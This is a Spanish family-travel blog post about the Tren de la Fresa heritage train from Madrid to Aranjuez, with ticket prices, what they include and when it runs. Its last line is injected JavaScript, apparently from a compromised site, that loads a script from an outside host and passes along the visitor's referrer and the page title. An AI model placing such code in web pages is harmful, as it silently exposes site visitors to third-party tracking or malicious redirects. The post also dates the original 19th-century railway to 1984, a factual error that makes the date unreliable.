Viajando en el Tren de la Fresa

29/04/2016

IMG_9827.1

¿Sabíais qué el primer ferrocarril de la Comunidad de Madrid fue el qué unió Madrid con Aranjuez? ¿Sabíais qué además este tren fue el segundo tren existente en toda la Península Ibérica? ¿Y sabíais qué hoy en día sigue existiendo un tren que mantiene este mismo recorrido y qué encima rememora el aspecto, ambiente y características de 1984, el año en el que se inaugurara aquel primer tren? ¿Y sabíais qué este tren cuadra a la perfección en nuestra sección de planes con niños en Madrid? Pues sí, sí, sí y sí. Y el nombre de este particular ferrocarril no es otro que el conocido Tren de la Fresa y puedes disfrutarlo a partir del 2 de mayo.

El recorrido de este tren tan especial comienza en la Estación de Delicias de Madrid -en el Museo del Ferrocarril, Paseo de las Delicias número 61- y finaliza en la estación de trenes de Aranjuez. Como decíamos no se trata de un recorrido al uso en ferrocarril. Además de que el viaje se emprende a bordo de unos curiosos coches de madera y que sus azafatas van vestidas de época, te encontrarás también con la oportunidad de degustar uno de los fresones más sabrosos del mundo. No en vano, el nombre del tren se refiere a este excelente producto 🙂 . El precio del billete -sobre 30 euros adultos y 15 euros niños mayores de 4 años- incluye:

– Viaje de ida y de vuelta.

– Traslado entre la estación de Aranjuez y su zona monumental.

– Visita guiada al Palacio Real de Aranjuez.

– Visita libre al Museo de Faluas Reales.

– Descuento del 50% para el Museo Taurino de Aranjuez.

Detalle importante a tener en cuenta, este tren no está activo durante todo el año. Comprueba fechas en su web para cerciorarte de las mismas. Y ya te adelantamos que su época de apogeo es fundamentalmente en primavera y en otoño (meses de mayo -a partir del día 2- y junio y de septiembre y octubre). Sea como sea, si tienes la oportunidad de disfrutar de este plan con los más pequeños de la casa, ¡no la dejas escapar! Todos saldréis encantados.

Foto | Andrés Gómez – Club Ferroviario 241

 

 s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;